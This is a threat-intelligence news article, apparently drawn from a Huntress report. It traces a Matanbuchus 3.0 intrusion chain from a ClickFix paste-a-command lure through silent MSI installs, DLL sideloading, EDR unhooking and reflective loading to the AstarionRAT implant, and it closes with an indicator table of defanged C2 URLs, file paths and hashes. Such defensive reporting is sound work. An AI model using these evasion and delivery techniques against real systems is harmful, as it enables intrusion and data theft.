Matanbuchus 3.0 has resurfaced in a tightly orchestrated intrusion chain that blends ClickFix social engineering, silent MSI installations, DLL sideloading, and a new remote access trojan dubbed AstarionRAT, underscoring how mature loaders are evolving toward stealthy, multi‑stage operations rather than simple payload delivery.
The attack starts with a ClickFix prompt that convinces the victim to copy and paste a crafted command into a local console, effectively turning the user into the execution vector and bypassing email and attachment filtering.
The command abuses msiexec.exe with mixed casing and the /q (silent) flag to install a remote MSI package without any visible UI, ensuring the user sees no installer windows or warnings.
The MSI itself is fetched from newly registered, brand‑impersonating infrastructure, using obfuscated URLs that collapse to a single download path but make proxy and log analysis more difficult.
Once executed, the MSI deploys files under fake “security product” directories in the user profile, dropping renamed legitimate binaries alongside malicious DLLs designed for sideloading.
Among these is Zillya! Antivirus components and Visual C++ runtimes, plus SystemStatus.dll, which acts as the embedded Matanbuchus 3.0 loader.
The Huntress Tactical Response team and SOC responded to a hands-on intrusion that began with a ClickFix infection, the social engineering technique that just won’t die.
A renamed 7‑Zip executable extracts a password‑protected archive that contains the full Zillya sideloading bundle, reinforcing the theme of living‑off‑the‑land with trusted tools wrapped around custom code.
Matanbuchus 3.0 Unleashes AstarionRAT
Matanbuchus 3.0 represents a ground‑up rewrite of the loader, sold as a high‑end Malware‑as‑a‑Service aimed at targeted operations rather than high‑volume spam.
In the observed intrusion, the operators used this foothold to move from initial access to domain controllers in under 40 minutes, leveraging PsExec, rogue account creation, and Defender exclusions tactics consistent with pre‑ransomware staging or large‑scale data theft.
The loader is heavily padded with junk API calls, dead loops, and opaque conditional branches that inflate the control‑flow graph and burn sandbox time, complicating both dynamic and static analysis.
All sensitive strings are stored in a single ChaCha20‑encrypted blob; an index table tracks offsets and lengths, and the loader decrypts required strings on demand with a shared key and nonce pulled from the blob header.
Core shellcode is stored externally in a file named INFO, also ChaCha20‑encrypted, with the key recovered via brute‑force using a known‑plaintext check based on a Heavens Gate shellcode prologue.
Once decrypted, the shellcode reconstructs a hardcoded HTTPS C2 URL character by character, downloads the main Matanbuchus module, and decrypts it in 8 KB chunks with ChaCha20, using a custom header format that includes a 32‑byte key and 12‑byte nonce.
Before executing downstream payloads, Matanbuchus enumerates running processes for EDR and AV names, allowing operators to adapt their playbook to the victim’s security stack.
Advertised on underground forums at $10,000/month for the HTTPS version and $15,000 for the DNS version, Matanbuchus 3.0 boasts a new client and panel built from scratch.
The next stage involves a second DLL sideload chain with a legitimate java.exe and a malicious jli.dll that embeds a full Lua 5.4.7 interpreter to orchestrate shellcode execution.
The loader first unhooks kernel32.dll and ntdll.dll by mapping clean copies from the Windows KnownDlls object directory and overwriting the hooked .text sections in memory, stripping away user‑mode EDR inline hooks before any sensitive API calls.
It then decrypts an auxiliary Lua script (SySUpd) with a rolling XOR key, loads it into the embedded interpreter, and uses custom Lua‑registered functions to allocate RWX memory, copy shellcode, and pivot execution into a reflective PE loader.
This reflective loader consumes a custom binary stream format containing the Stage 1 DLL components, including the .text section, encrypted imports and relocations, and XOR keys.
It reconstructs the PE in memory, resolves imports by hashing export names, patches the IAT, and finally passes a large compressed Stage 2 payload to be decompressed via RtlDecompressBuffer using LZNT1.
The output is a raw PE image identified as Beacon.exe, which is mapped into memory and executed as the final AstarionRAT implant.
ClickFix Social Engineering
AstarionRAT is a fully featured remote access trojan with 24 documented commands covering file management, process control, credential‑backed logon, SOCKS5 tunneling port, scanning, and in‑memory reflective payload execution.
Three global constants stored in the .data section feed into opaque predicates repeated hundreds of times throughout the binary.
On initial check‑in, it builds a metadata structure with a 0xBEEF magic value, randomly generated session key material (later hashed with SHA‑256), system code pages, a random even beacon ID, PID, privilege level, OS version, local IP, and an identifier string combining computer name, username, and process name.
This metadata is RSA‑encrypted with a hardcoded 1024‑bit public key and sent over HTTP GET, with subsequent task results returned via HTTP POST, in a polling loop that defaults to 10‑second intervals.
The HTTP profile is crafted to blend into enterprise traffic, using an Edge‑style User‑Agent, Chinese language preferences, and a Google referer, while embedding the beacon data inside a cookie value that masquerades as application telemetry.
C2 domains are stored RC4‑encrypted and hex‑encoded in the data section, decrypted at runtime with a 110‑byte key, with one observed endpoint masquerading as a legitimate “organization events” intake path.
Indicators of compromise (IOCs)
| Item | Description |
| hxxp://binclloudapp[.]com/466943 | ClickFix MSI delivery C2 |
| hxxps://marle[.]io/check/updprofile.aspx | Matanbuchus C2 – serves encrypted main module |
| www.ndibstersoft[.]com | AstarionRAT C2 |
| /intake/organizations/events?channel=app | AstarionRAT beacon polling path |
| %APPDATA%AegisLynx Cybernetics LtdAegisLynx Threat FabricAVU | Matanbuchus MSI install path |
| %APPDATA%DocuRay Technologies S.r.lDocuRay PDF ProfessionalZAVY | Matanbuchus MSI install path |
| %APPDATA%HelixShield Technologies ApSHelixShield Adaptive SecurityAPSZAV | Matanbuchus MSI install path |
| %LOCALAPPDATA%Tempndvyxgdriggmarrf | Stage 2 DLL sideloading package drop path |
| INFO SHA256: de81e2155d797ff729ed3112fd271aa2728e75fc71b023d0d9bb0f62663f33b3 | Encrypted shellcode payload delivered alongside the MSI, contains shellcode that downloads the Matanbuchus main module from the C2 |
| SystemStatus.dll SHA256:6ffae128e0dbf14c00e35d9ca17c9d6c81743d1fc5f8dd4272a03c66ecc1ad1f | Matanbuchus Loader payload |
| jli.dll SHA256:68858d3cbc9b8abaed14e85fc9825bc4fffc54e8f36e96ddda09e853a47e3e31 | Stage 2 loader, decrypts and executes the Lua script from SySUpd |
| SySUpd SHA256:03c624d251e9143e1c8d90ba9b7fa1f2c5dc041507fd0955bdd4048a0967a829 | XOR-encrypted Lua script |
| Reflective PE loader SHA256:8e54cd12591d67dfbe72e94c1bde6059e1cba157e6786aec63f8f9e3c71fb925 | Reflective PE loader that reconstructs the Stage 1 DLL from a custom binary stream and passes the final payload (AstarionRAT) to it |
| Stage 1 payload SHA256: c31c8edbf94c85cc9bc46a5665c45a3556c48d5ad615c0a44e14e5406d80df12 | Small loader with no import table, XOR-decrypts and LZNT1-decompresses the final payload, maps it into memory, and creates a thread to execute it |
| Beacon.exe SHA256: eecc83add16f3d513a9701e9a646b1885014229ac6f86addd6b10afb64d1d2af | AstarionRAT |
| Updprofile.aspx SHA256: ea378496135318ac5ad667a032fa4a9686add9d27fe4a7c549c937611b5099e5 | Matanbuchus Core Module |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
